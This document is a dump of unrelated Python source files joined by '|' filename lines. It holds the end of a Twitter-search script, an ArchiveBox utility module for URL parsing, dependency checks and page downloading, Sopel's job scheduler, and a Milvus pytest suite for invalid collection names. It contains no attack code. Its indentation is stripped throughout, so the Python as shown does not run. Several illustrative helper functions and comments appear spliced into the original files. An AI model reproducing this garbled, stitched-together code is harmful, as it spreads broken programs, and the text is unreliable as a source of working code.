parser.add_argument("--logconfig", nargs="?", default="logging.ini", help="config file for logging (default is logging.ini")
args = parser.parse_args()
try:
logging.config.fileConfig(args.logconfig)
except configparser.NoSectionError:
logging.basicConfig()
log.logs.critical("Logging config file not found: {}".format(args.logconfig))
Log.logs.debug(args)
config = Config(args.config)
config_change = threading.Event()
config_thread = threading.Thread(target=config.check_updates, args=(config_change,))
config_thread.start()
twitter_search(config, config_change)
|
util.py
|
import os
import re
import sys
import time
from urllib.request import Request, urlopen
from urllib.parse import urlparse, quote
from decimal import Decimal
from datetime import datetime
from multiprocessing import Process
from subprocess import TimeoutExpired, Popen, PIPE, DEVNULL, CompletedProcess, CalledProcessError
from config import (
ANSI,
TERM_WIDTH,
REPO_DIR,
SOURCES_DIR,
ARCHIVE_DIR,
OUTPUT_PERMISSIONS,
TIMEOUT,
SHOW_PROGRESS,
CHECK_SSL_VALIDITY,
WGET_USER_AGENT,
CURL_BINARY,
WGET_BINARY,
CHROME_BINARY,
GIT_BINARY,
YOUTUBEDL_BINARY,
FETCH_TITLE,
FETCH_FAVICON,
FETCH_WGET,
FETCH_WARC,
FETCH_PDF,
FETCH_SCREENSHOT,
FETCH_DOM,
FETCH_GIT,
FETCH_MEDIA,
SUBMIT_ARCHIVE_DOT_ORG,
ARCHIVE_DIR_NAME,
)
### Parsing Helpers
# Url Parsing: https://docs.python.org/3/library/urllib.parse.html#url-parsing
scheme = lambda url: urlparse(url).scheme
without_scheme = lambda url: urlparse(url)._replace(scheme='').geturl().strip('//')
without_query = lambda url: urlparse(url)._replace(query='').geturl().strip('//')
without_fragment = lambda url: urlparse(url)._replace(fragment='').geturl().strip('//')
without_path = lambda url: urlparse(url)._replace(path='', fragment='', query='').geturl().strip('//')
path = lambda url: urlparse(url).path
basename = lambda url: urlparse(url).path.rsplit('/', 1)[-1]
domain = lambda url: urlparse(url).netloc
query = lambda url: urlparse(url).query
fragment = lambda url: urlparse(url).fragment
extension = lambda url: basename(url).rsplit('.', 1)[-1].lower() if '.' in basename(url) else ''
base_url = lambda url: without_scheme(url) # unique base url used to dedupe links
short_ts = lambda ts: ts.split('.')[0]
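# Example outputs (illustrative): for url = 'https://example.com/a/b.html?q=1#frag'
#   domain(url)        -> 'example.com'
#   base_url(url)      -> 'example.com/a/b.html?q=1#frag'
#   extension(url)     -> 'html'
#   without_query(url) -> 'https://example.com/a/b.html#frag'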
URL_REGEX = re.compile(
r'http[s]?://' # start matching from allowed schemes
r'(?:[a-zA-Z]|[0-9]' # followed by allowed alphanum characters
r'|[$-_@.&+]|[!*\(\),]' # or allowed symbols
r'|(?:%[0-9a-fA-F][0-9a-fA-F]))' # or allowed unicode bytes
r'[^\]\[\(\)<>\""\'\s]+', # stop parsing at these symbols
re.IGNORECASE,
)
HTML_TITLE_REGEX = re.compile(
r'<title>' # start matching text after <title> tag
r'(.[^<>]+)', # get everything up to these symbols
re.IGNORECASE,
)
### Checks & Tests
def check_link_structure(link):
"""basic sanity check invariants to make sure the data is valid"""
assert isinstance(link, dict)
assert isinstance(link.get('url'), str)
assert len(link['url']) > 2
assert len(re.findall(URL_REGEX, link['url'])) == 1
def check_links_structure(links):
"""basic sanity check invariants to make sure the data is valid"""
assert isinstance(links, list)
if links:
check_link_structure(links[0])
def check_dependencies():
"""Check that all necessary dependencies are installed, and have valid versions"""
python_vers = float('{}.{}'.format(sys.version_info.major, sys.version_info.minor))
if python_vers < 3.5:
print('{}[X] Python version is not new enough: {} (>3.5 is required){}'.format(ANSI['red'], python_vers, ANSI['reset']))
print(' See https://github.com/pirate/ArchiveBox#troubleshooting for help upgrading your Python installation.')
raise SystemExit(1)
if FETCH_FAVICON or SUBMIT_ARCHIVE_DOT_ORG:
if run(['which', CURL_BINARY], stdout=DEVNULL).returncode or run([CURL_BINARY, '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: curl{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(CURL_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
if FETCH_WGET or FETCH_WARC:
if run(['which', WGET_BINARY], stdout=DEVNULL).returncode or run([WGET_BINARY, '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: wget{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(WGET_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
if FETCH_PDF or FETCH_SCREENSHOT or FETCH_DOM:
if run(['which', CHROME_BINARY], stdout=DEVNULL).returncode:
print('{}[X] Missing dependency: {}{}'.format(ANSI['red'], CHROME_BINARY, ANSI['reset']))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(CHROME_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
# parse chrome --version e.g. Google Chrome 61.0.3114.0 canary / Chromium 59.0.3029.110 built on Ubuntu, running on Ubuntu 16.04
try:
result = run([CHROME_BINARY, '--version'], stdout=PIPE)
version_str = result.stdout.decode('utf-8')
version_lines = re.sub("(Google Chrome|Chromium) (\\d+?)\\.(\\d+?)\\.(\\d+?).*?$", "\\2", version_str).split('\n')
version = [l for l in version_lines if l.isdigit()][-1]
if int(version) < 59:
print(version_lines)
print('{red}[X] Chrome version must be 59 or greater for headless PDF, screenshot, and DOM saving{reset}'.format(**ANSI))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
except (IndexError, TypeError, OSError):
print('{red}[X] Failed to parse Chrome version, is it installed properly?{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(CHROME_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
if FETCH_GIT:
if run(['which', GIT_BINARY], stdout=DEVNULL).returncode or run([GIT_BINARY, '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: git{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(GIT_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
if FETCH_MEDIA:
if run(['which', YOUTUBEDL_BINARY], stdout=DEVNULL).returncode or run([YOUTUBEDL_BINARY, '--version'], stdout=DEVNULL).returncode:
print('{red}[X] Missing dependency: youtube-dl{reset}'.format(**ANSI))
print(' Run ./setup.sh, then confirm it was installed with: {} --version'.format(YOUTUBEDL_BINARY))
print(' See https://github.com/pirate/ArchiveBox for help.')
raise SystemExit(1)
def check_url_parsing():
"""Check that plain text regex URL parsing works as expected"""
test_urls = '''
https://example1.com/what/is/happening.html?what=1#how-about-this=1
https://example2.com/what/is/happening/?what=1#how-about-this=1
HTtpS://example3.com/what/is/happening/?what=1#how-about-this=1f
https://example4.com/what/is/happening.html
https://example5.com/
https://example6.com
<test>http://example7.com</test>
[https://example8.com/what/is/this.php?what=1]
[and http://example9.com?what=1&other=3#and-thing=2]
<what>https://example10.com#and-thing=2 "</about>
abc<this["https://example11.com/what/is#and-thing=2?whoami=23&where=1"]that>def
sdflkf[what](https://example12.com/who/what.php?whoami=1#whatami=2)?am=hi
example13.bada
and example14.badb
<or>htt://example15.badc</that>
'''
# print('\n'.join(re.findall(URL_REGEX, test_urls)))
assert len(re.findall(URL_REGEX, test_urls)) == 12
### Random Helpers
def save_stdin_source(raw_text):
if not os.path.exists(SOURCES_DIR):
os.makedirs(SOURCES_DIR)
ts = str(datetime.now().timestamp()).split('.', 1)[0]
source_path = os.path.join(SOURCES_DIR, '{}-{}.txt'.format('stdin', ts))
with open(source_path, 'w', encoding='utf-8') as f:
f.write(raw_text)
return source_path
def save_remote_source(url, timeout=TIMEOUT):
"""download a given url's content into output/sources/domain-<timestamp>.txt"""
if not os.path.exists(SOURCES_DIR):
os.makedirs(SOURCES_DIR)
ts = str(datetime.now().timestamp()).split('.', 1)[0]
source_path = os.path.join(SOURCES_DIR, '{}-{}.txt'.format(domain(url), ts))
print('{}[*] [{}] Downloading {}{}'.format(
ANSI['green'],
datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
url,
ANSI['reset'],
))
end = progress(TIMEOUT, prefix=' ')
try:
downloaded_xml = download_url(url, timeout=timeout)
end()
except Exception as e:
end()
print('{}[!] Failed to download {}{}\n'.format(
ANSI['red'],
url,
ANSI['reset'],
))
print(' ', e)
raise SystemExit(1)
with open(source_path, 'w', encoding='utf-8') as f:
f.write(downloaded_xml)
print(' > {}'.format(pretty_path(source_path)))
return source_path
def fetch_page_title(url, timeout=10, progress=SHOW_PROGRESS):
"""Attempt to guess a page's title by downloading the html"""
if not FETCH_TITLE:
return None
try:
if progress:
sys.stdout.write('.')
sys.stdout.flush()
html = download_url(url, timeout=timeout)
match = re.search(HTML_TITLE_REGEX, html)
return match.group(1).strip() if match else None
except Exception as err:
# print('[!] Failed to fetch title because of {}: {}'.format(
# err.__class__.__name__,
# err,
# ))
return None
def wget_output_path(link, look_in=None):
"""calculate the path to the wgetted .html file, since wget may
adjust some paths to be different than the base_url path.
See docs on wget --adjust-extension (-E)
"""
# if we have it stored, always prefer the actual output path to computed one
if link.get('latest', {}).get('wget'):
return link['latest']['wget']
urlencode = lambda s: quote(s, encoding='utf-8', errors='replace')
if link['type'] in ('PDF', 'image'):
return urlencode(base_url(link['url']))
# Since the wget algorithm for -E (appending .html) is incredibly complex
# instead of trying to emulate it here, we just look in the output folder
# to see what html file wget actually created as the output
wget_folder = base_url(link['url']).rsplit('/', 1)[0].split('/')
look_in = os.path.join(ARCHIVE_DIR, link['timestamp'], *wget_folder)
if look_in and os.path.exists(look_in):
html_files = [
f for f in os.listdir(look_in)
if re.search(".+\\.[Hh][Tt][Mm][Ll]?$", f, re.I | re.M)
]
if html_files:
return urlencode(os.path.join(*wget_folder, html_files[0]))
return None
# If finding the actual output file didn't work, fall back to the buggy
# implementation of the wget .html appending algorithm
# split_url = link['url'].split('#', 1)
# query = ('%3F' + link['url'].split('?', 1)[-1]) if '?' in link['url'] else ''
# if re.search(".+\\.[Hh][Tt][Mm][Ll]?$", split_url[0], re.I | re.M):
# # already ends in .html
# return urlencode(base_url(link['url']))
# else:
# # .html needs to be appended
# without_scheme = split_url[0].split('://', 1)[-1].split('?', 1)[0]
# if without_scheme.endswith('/'):
# if query:
# return urlencode('#'.join([without_scheme + 'index.html' + query + '.html', *split_url[1:]]))
# return urlencode('#'.join([without_scheme + 'index.html', *split_url[1:]]))
# else:
# if query:
# return urlencode('#'.join([without_scheme + '/index.html' + query + '.html', *split_url[1:]]))
# elif '/' in without_scheme:
# return urlencode('#'.join([without_scheme + '.html', *split_url[1:]]))
# return urlencode(base_url(link['url']) + '/index.html')
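# A hedged sketch of the lookup above (not from the original source): for a
# link saved at timestamp 1510001000, wget --adjust-extension typically writes
# something like <ARCHIVE_DIR>/1510001000/example.com/page.html, in which case
# wget_output_path(link) returns the URL-encoded relative path
# 'example.com/page.html'; if no matching .html file is found, it returns None.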
### String Manipulation & Logging Helpers
def str_between(string, start, end=None):
"""(<abc>12345</def>, <abc>, </def>) -> 12345"""
content = string.split(start, 1)[-1]
if end is not None:
content = content.rsplit(end, 1)[0]
return content
def pretty_path(path):
"""convert paths like .../ArchiveBox/archivebox/../output/abc into output/abc"""
return path.replace(REPO_DIR + '/', '')
def print_error_hints(cmd, pwd, err=None, hints=None, prefix=' '):
"""quote the argument with whitespace in a command so the user can
copy-paste the outputted string directly to run the cmd
"""
quoted_cmd = ' '.join(
'"{}"'.format(arg) if ' ' in arg else arg
for arg in cmd
)
output_lines = [
'{}Failed: {} {}{}'.format(ANSI['red'], err.__class__.__name__, err, ANSI['reset']),
' {}{}{}'.format(ANSI['lightyellow'], hints, ANSI['reset']) if hints else None,
'Run to see full output:',
' cd {};'.format(pwd),
' {}'.format(quoted_cmd),
]
return '\n'.join(
'{}{}'.format(prefix, line)
for line in output_lines
if line
)
### Link Helpers
def merge_links(a, b):
"""deterministially merge two links, favoring longer field values over shorter,
and "cleaner" values over worse ones.
"""
longer = lambda key: (a[key] if len(a[key]) > len(b[key]) else b[key]) if (a[key] and b[key]) else (a[key] or b[key])
earlier = lambda key: a[key] if a[key] < b[key] else b[key]
url = longer('url')
longest_title = longer('title')
cleanest_title = a['title'] if '://' not in (a['title'] or '') else b['title']
link = {
'timestamp': earlier('timestamp'),
'url': url,
'domain': domain(url),
'base_url': base_url(url),
'tags': longer('tags'),
'title': longest_title if '://' not in (longest_title or '') else cleanest_title,
'sources': list(set(a.get('sources', []) + b.get('sources', []))),
}
link['type'] = get_link_type(link)
return link
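# A hedged usage sketch (not part of the original module): merging two entries
# for the same URL keeps the earlier timestamp, the longer tags, and the
# cleaner (non-URL) title, then re-derives the link type. The field values
# below are made up for illustration.
def _example_merge_links():
    """Illustrative only."""
    a = {'timestamp': '1510001000.0', 'url': 'https://example.com/a.pdf',
         'title': 'Example PDF', 'tags': 'docs'}
    b = {'timestamp': '1510009999.0', 'url': 'https://example.com/a.pdf',
         'title': 'https://example.com/a.pdf', 'tags': ''}
    merged = merge_links(a, b)
    assert merged['timestamp'] == '1510001000.0'   # earlier timestamp wins
    assert merged['title'] == 'Example PDF'        # non-URL title preferred
    assert merged['tags'] == 'docs'                # longer/non-empty tags kept
    return merged                                  # merged['type'] is set by get_link_type()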
def get_link_type(link):
"""Certain types of links need to be handled specially, this figures out when that's the case"""
if extension(link['url']) == 'pdf':
return 'PDF'
elif extension(link['url']) in ('pdf', 'png', 'jpg', 'jpeg', 'svg', 'bmp', 'gif', 'tiff', 'webp'):
return 'image'
elif 'wikipedia.org' in domain(link['url']).lower():
return 'wiki'
elif 'youtube.com' in domain(link['url']).lower():
return 'youtube'
elif 'soundcloud.com' in domain(link['url']).lower():
return 'soundcloud'
elif 'youku.com' in domain(link['url']).lower():
return 'youku'
elif 'vimeo.com' in domain(link['url']).lower():
return 'vimeo'
return None
def derived_link_info(link):
"""extend link info with the archive urls and other derived data"""
url = link['url']
to_date_str = lambda ts: datetime.fromtimestamp(Decimal(ts)).strftime('%Y-%m-%d %H:%M')
extended_info = {
**link,
'link_dir': '{}/{}'.format(ARCHIVE_DIR_NAME, link['timestamp']),
'bookmarked_date': to_date_str(link['timestamp']),
'updated_date': to_date_str(link['updated']) if 'updated' in link else None,
'domain': domain(url),
'path': path(url),
'basename': basename(url),
'base_url': base_url(url),
}
# Archive Method Output URLs
extended_info = {
**extended_info,
'index_url': 'index.html',
'favicon_url': 'favicon.ico',
'google_favicon_url': 'https://www.google.com/s2/favicons?domain={domain}'.format(**extended_info),
'archive_url': wget_output_path(link) or 'index.html',
'warc_url': 'warc',
'pdf_url': 'output.pdf',
'screenshot_url': 'screenshot.png',
'dom_url': 'output.html',
'archive_org_url': 'https://web.archive.org/web/{base_url}'.format(**extended_info),
'git_url': 'git',
'media_url': 'media',
}
# PDF and images are handled slightly differently
# wget, screenshot, & pdf urls all point to the same file
if link['type'] in ('PDF', 'image'):
extended_info.update({
'title': basename(link['url']),
'archive_url': base_url(url),
'pdf_url': base_url(url),
'screenshot_url': base_url(url),
'dom_url': base_url(url),
})
return extended_info
### Python / System Helpers
def progress(seconds=TIMEOUT, prefix=''):
"""Show a (subprocess-controlled) progress bar with a <seconds> timeout,
returns end() function to instantly finish the progress
"""
if not SHOW_PROGRESS:
return lambda: None
def progress_bar(seconds, prefix):
"""show timer in the form of progress bar, with percentage and seconds remaining"""
chunk = '█' if sys.stdout.encoding == 'UTF-8' else '#'
chunks = TERM_WIDTH - len(prefix) - 20 # number of progress chunks to show (aka max bar width)
try:
for s in range(seconds * chunks):
progress = s / chunks / seconds * 100
bar_width = round(progress/(100/chunks))
# ████████████████████ 0.9% (1/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)'.format(
prefix,
ANSI['green'],
(chunk * bar_width).ljust(chunks),
ANSI['reset'],
round(progress, 1),
round(s/chunks),
seconds,
))
sys.stdout.flush()
time.sleep(1 / chunks)
# ██████████████████████████████████ 100.0% (60/60sec)
sys.stdout.write('\r{0}{1}{2}{3} {4}% ({5}/{6}sec)\n'.format(
prefix,
ANSI['red'],
chunk * chunks,
ANSI['reset'],
100.0,
seconds,
seconds,
))
sys.stdout.flush()
except KeyboardInterrupt:
print()
pass
p = Process(target=progress_bar, args=(seconds, prefix))
p.start()
def end():
"""immediately finish progress and clear the progressbar line"""
# protect from double termination
#if p is None or not hasattr(p, 'kill'):
# return
nonlocal p
if p is not None:
p.terminate()
p = None
sys.stdout.write('\r{}{}\r'.format((' ' * TERM_WIDTH), ANSI['reset'])) # clear whole terminal line
sys.stdout.flush()
return end
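# A minimal usage sketch (not in the original file), mirroring how progress()
# is used in save_remote_source() above: start the bar before a slow step, then
# call the returned end() function to clear the line whether the step succeeds
# or fails. `slow_step` is a hypothetical placeholder.
def _example_progress_usage(slow_step=lambda: time.sleep(2)):
    """Illustrative only."""
    end = progress(TIMEOUT, prefix='      ')
    try:
        slow_step()
        end()
    except Exception:
        end()
        raise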
def download_url(url, timeout=TIMEOUT):
req = Request(url, headers={'User-Agent': WGET_USER_AGENT})
if CHECK_SSL_VALIDITY:
resp = urlopen(req, timeout=timeout)
else:
import ssl
insecure = ssl._create_unverified_context()
resp = urlopen(req, timeout=timeout, context=insecure)
encoding = resp.headers.get_content_charset() or 'utf-8'
return resp.read().decode(encoding)
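# A hedged usage sketch (not part of the original source): download_url()
# fetches a page with the configured WGET_USER_AGENT and decodes it using the
# charset declared by the response, so the caller can parse it directly.
# This mirrors what fetch_page_title() does above.
def _example_download_and_parse_title(url='https://example.com'):
    """Illustrative only; requires network access."""
    html = download_url(url, timeout=TIMEOUT)
    match = re.search(HTML_TITLE_REGEX, html)
    return match.group(1).strip() if match else None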
def chmod_file(path, cwd='.', permissions=OUTPUT_PERMISSIONS, timeout=30):
"""chmod -R <permissions> <cwd>/<path>"""
if not os.path.exists(os.path.join(cwd, path)):
raise Exception('Failed to chmod: {} does not exist (did the previous step fail?)'.format(path))
chmod_result = run(['chmod', '-R', permissions, path], cwd=cwd, stdout=DEVNULL, stderr=PIPE, timeout=timeout)
if chmod_result.returncode == 1:
print(' ', chmod_result.stderr.decode())
raise Exception('Failed to chmod {}/{}'.format(cwd, path))
def run(*popenargs, input=None, capture_output=False, timeout=None, check=False, **kwargs):
"""Patched of subprocess.run to fix blocking io making timeout=innefective"""
if input is not None:
if 'stdin' in kwargs:
raise ValueError('stdin and input arguments may not both be used.')
kwargs['stdin'] = PIPE
if capture_output:
if ('stdout' in kwargs) or ('stderr' in kwargs):
raise ValueError('stdout and stderr arguments may not be used '
'with capture_output.')
kwargs['stdout'] = PIPE
kwargs['stderr'] = PIPE
with Popen(*popenargs, **kwargs) as process:
try:
stdout, stderr = process.communicate(input, timeout=timeout)
except TimeoutExpired:
process.kill()
try:
stdout, stderr = process.communicate(input, timeout=2)
except:
pass
raise TimeoutExpired(popenargs[0][0], timeout)
except BaseException as err:
process.kill()
# We don't call process.wait() as .__exit__ does that for us.
raise
retcode = process.poll()
if check and retcode:
raise CalledProcessError(retcode, process.args,
output=stdout, stderr=stderr)
return CompletedProcess(process.args, retcode, stdout, stderr)
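# A hedged usage sketch (assumption, not from the original file): the patched
# run() accepts the same arguments as subprocess.run(), but reliably kills the
# child when the timeout expires even if it is blocking on stdout/stderr.
def _example_run_with_timeout(cmd=('sleep', '60')):
    """Illustrative only; assumes a Unix-like `sleep` binary is available."""
    try:
        return run(list(cmd), stdout=PIPE, stderr=PIPE, timeout=2).returncode
    except TimeoutExpired:
        return None  # the child was killed after 2 seconds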
|
jobs.py
|
# coding=utf-8
"""Sopel's Job Scheduler: internal tool for job management.
.. note::
As of Sopel 5.3, :mod:`sopel.tools.jobs` is an internal tool. Therefore,
it is not shown in the public documentation.
"""
from __future__ import unicode_literals, absolute_import, print_function, division
import datetime
import sys
import threading
import time
py3 = sys.version_info.major >= 3
class JobScheduler(threading.Thread):
"""Calls jobs assigned to it in steady intervals.
JobScheduler is a thread that keeps track of Jobs and calls them every
X seconds, where X is a property of the Job.
Thread safety is ensured with an internal mutex.
It runs forever until the :attr:`stopping` event is set using the
:meth:`stop` method.
"""
def __init__(self, bot):
"""Requires bot as argument for logging."""
threading.Thread.__init__(self)
self.bot = bot
self.stopping = threading.Event()
self._jobs = []
self._mutex = threading.Lock()
def add_job(self, job):
"""Add a Job to the current job queue."""
with self._mutex:
self._jobs.append(job)
def clear_jobs(self):
"""Clear current Job queue and start fresh."""
with self._mutex:
self._jobs = []
def stop(self):
"""Ask the job scheduler to stop.
The scheduler thread will stop its loop over jobs to process, but it
won't join the thread, or clear its queue—this has to be done
separately by the calling thread.
"""
self.stopping.set()
def remove_callable_job(self, callable):
"""Removes specific callable from job queue"""
with self._mutex:
self._jobs = [
job for job in self._jobs
if job.func != callable
]
def run(self):
"""Run forever until :attr:`stopping` event is set."""
while not self.stopping.is_set():
try:
now = time.time()
# Collect ready jobs by now
for job in self._get_ready_jobs(now):
self._run_job(job)
# Wait up to a second
time_spent = time.time() - now
wait_time = max(0, 1 - time_spent)
if wait_time:
time.sleep(wait_time)
except KeyboardInterrupt:
# Do not block on KeyboardInterrupt
raise
except Exception: # TODO: Be specific
# Module exceptions are caught earlier, so this is a bit
# more serious. Options are to either stop the main thread
# or continue this thread and hope that it won't happen
# again.
self.bot.error()
# Sleep a bit to guard against busy-looping and filling
# the log with useless error messages.
time.sleep(10.0) # seconds
def _get_ready_jobs(self, now):
with self._mutex:
jobs = [job for job in self._jobs if job.is_ready_to_run(now)]
return jobs
def _run_job(self, job):
if job.func.thread:
t = threading.Thread(
target=self._call, args=(job.func,)
)
t.start()
else:
self._call(job.func)
job.next()
def _call(self, func):
"""Wrapper for collecting errors from modules."""
try:
func(self.bot)
except KeyboardInterrupt:
# Do not block on KeyboardInterrupt
raise
except Exception: # TODO: Be specific
self.bot.error()
class Job(object):
"""Hold information about when a function should be called next.
Job is a simple structure that holds information about when a function
should be called next.
They can be put in a priority queue, in which case the Job that should
be executed next is returned.
Calling the method next modifies the Job object for the next time it
should be executed. Current time is used to decide when the job should
be executed next so it should only be called right after the function
was called.
"""
max_catchup = 5
"""How many seconds the job can get behind.
This governs how much the scheduling of jobs is allowed to get behind
before they are simply thrown out to avoid calling the same function too
many times at once.
"""
def __init__(self, interval, func):
"""Initialize Job.
Args:
interval: number of seconds between calls to func
func: function to be called
"""
self.next_time = time.time() + interval
self.interval = interval
self.func = func
def is_ready_to_run(self, at_time):
"""Check if this job is (or will be) ready to run at the given time.
:param int at_time: Timestamp to check, in seconds
:return: ``True`` if the job is (or will be) ready to run, ``False``
otherwise
:rtype: boolean
"""
return (self.next_time - at_time) <= 0
def next(self):
"""Update self.next_time with the assumption func was just called.
Returns: A modified job object.
"""
last_time = self.next_time
current_time = time.time()
delta = last_time + self.interval - current_time
if last_time > current_time + self.interval:
# Clock appears to have moved backwards. Reset
# the timer to avoid waiting for the clock to
# catch up to whatever time it was previously.
self.next_time = current_time + self.interval
elif delta < 0 and abs(delta) > self.interval * self.max_catchup:
# Execution of jobs is too far behind. Give up on
# trying to catch up and reset the time, so that
# will only be repeated a maximum of
# self.max_catchup times.
self.next_time = current_time - \
self.interval * self.max_catchup
else:
self.next_time = last_time + self.interval
return self
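# A worked sketch of the catch-up logic above (not in the original source),
# assuming interval=60 and max_catchup=5: if next_time is 400s in the past,
# abs(delta) = 340 > 300, so next_time is reset to now - 300 and at most five
# consecutive catch-up runs can occur; if it is only 30s late, next_time simply
# advances by 60 from the previously scheduled time.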
def __str__(self):
"""Return a string representation of the Job object.
Example result::
<Job(2013-06-14 11:01:36.884000, 20s, <function upper at 0x02386BF0>)>
"""
iso_time = str(datetime.datetime.fromtimestamp(self.next_time))
return "<Job(%s, %ss, %s)>" % (iso_time, self.interval, self.func)
|
test_utility.py
|
import threading
import pytest
from base.client_base import TestcaseBase
from base.utility_wrapper import ApiUtilityWrapper
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from common.milvus_sys import MilvusSys
prefix = "utility"
default_schema = cf.gen_default_collection_schema()
default_int64_field_name = ct.default_int64_field_name
default_field_name = ct.default_float_vec_field_name
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_dim = ct.default_dim
default_nb = ct.default_nb
num_loaded_entities = "num_loaded_entities"
num_total_entities = "num_total_entities"
class TestUtilityParams(TestcaseBase):
""" Test case of index interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
if request.param == [] or request.param == "":
pytest.skip("metric empty is valid for distance calculation")
if isinstance(request.param, str):
pytest.skip("string is valid type for metric")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_value(self, request):
if request.param == [] or request.param == "":
pytest.skip("metric empty is valid for distance calculation")
if not isinstance(request.param, str):
pytest.skip("Skip invalid type for metric")
yield request.param
@pytest.fixture(scope="function", params=["JACCARD", "Superstructure", "Substructure"])
def get_not_support_metric(self, request):
yield request.param
@pytest.fixture(scope="function", params=["metric_type", "metric"])
def get_support_metric_field(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition_names(self, request):
if isinstance(request.param, list):
if len(request.param) == 0:
pytest.skip("empty is valid for partition")
if request.param is None:
pytest.skip("None is valid for partition")
yield request.param
"""
******************************************************************
# The following are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_has_collection_name_invalid(self, get_invalid_collection_name):
"""
target: test has_collection with error collection name
method: input invalid name
expected: raise exception
"""
self._connect()
c_name = get_invalid_collection_name
if isinstance(c_name, str) and c_name:
self.utility_wrap.has_collection(
c_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid collection name"})
# elif not isinstance(c_name, str):
# self.utility_wrap.has_collection(c_name, check_task=CheckTasks.err_res, check_items={ct.err_code: 1, ct.err_msg: "illegal"})
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_collection_name_invalid(self, get_invalid_collection_name):
"""
target: test has_partition with error collection name
method: input invalid name
expected: raise exception
"""
self._connect()
c_name = get_invalid_collection_name
p_name = cf.gen_unique_str(prefix)
if isinstance(c_name, str) and c_name:
self.utility_wrap.has_partition(
c_name, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid"})
@pytest.mark.tags(CaseLabel.L1)
def test_has_partition_name_invalid(self, get_invalid_partition_name):
"""
target: test has_partition with error partition name
method: input invalid name
expected: raise exception
"""
self._connect()
ut = ApiUtilityWrapper()
c_name = cf.gen_unique_str(prefix)
p_name = get_invalid_partition_name
if isinstance(p_name, str) and p_name:
ex, _ = ut.has_partition(
c_name, p_name,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: "Invalid"})
@pytest.mark.tags(CaseLabel.L1)
def test_drop_collection_name_invalid(self, get_invalid_collection_name):
self._connect()
error = f'`collection_name` value {get_invalid_collection_name} is illegal'
self.utility_wrap.drop_collection(get_invalid_collection_name, check_task=CheckTasks.err_res,
check_items={ct.err_code: 1, ct.err_msg: error})
# TODO: enable
@pytest.mark.tags(CaseLabel.L1)
def test_list_collections_using_invalid(self):
"""
target: test list_collections with invalid using
method: input invalid name
expected: raise exception
"""
self._connect()
using = "empty"
ut = ApiUtilityWrapper()
ex, _ = ut.list_collections(using=using, check_task=CheckTasks.err_res,
check_items={ct.err_code: 0, ct.err_msg: "should create connect"})
@pytest.mark.tags(CaseLabel.L1)
def test_index_process_invalid_name(self, get_invalid_collection_name):
"""
target: test building_process
method: input invalid name
expected: raise exception
"""
pass
# self._connect()
# c_name = get_invalid_collection_name
# ut = ApiUtilityWrapper()
# if isinstance(c_name, str) and c_name:
# ex, _ = ut.index_building_progress(c_name, check_items={ct.err_code: 1, ct.err_msg: "Invalid collection name"})
# TODO: not support index name
@pytest.mark.tags(CaseLabel.L1)
def _test_index_process_invalid_index_name(self, get_invalid_index_name):
"""
target: test building_process
method: input invalid index name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
ut = ApiUtilityWrapper()
ex, _ = ut.index_building_progress(c_name, index_name)
log.error(str(ex))
assert "invalid" or "illegal" in str(ex)
@pytest.mark.tags(CaseLabel.L1)
def test_wait_index_invalid_name(self, get_invalid_collection_name):
"""
target: test wait_index
method: input invalid name
expected: raise exception
"""
pass
# self._connect()
# c_name = get_invalid_collection_name
# ut = ApiUtilityWrapper()
# if isinstance(c_name, str) and c_name:
# ex, _ = ut.wait_for_index_building_complete(c_name,
# check_items={ct.err_code: 1,
# ct.err_msg: "Invalid collection name"})
@pytest.mark.tags(CaseLabel.L1)
def _test_wait_index_invalid_index_name(self, get_invalid_index_name):
"""
target: test wait_index
method: input invalid index name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
index_name = get_invalid_index_name
ut = ApiUtilityWrapper()
ex, _ = ut.wait_for_index_building_complete(c_name, index_name)
log.error(str(ex))
assert "invalid" or "illegal" in str(ex)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("invalid_c_name", ["12-s", "12 s", "(mn)", "中文", "%$#"])
def test_loading_progress_invalid_collection_name(self, invalid_c_name):
"""
target: test loading progress with invalid collection name
method: input invalid collection name
expected: raise exception
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
df = cf.gen_default_dataframe_data()
self.collection_wrap.construct_from_dataframe(c_name, df, primary_field=ct.default_int64_field_name)
self.collection_wrap.load()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(invalid_c_name)}
self.utility_wrap.loading_progress(invalid_c_name, check_task=CheckTasks.err_res, check_items=error)
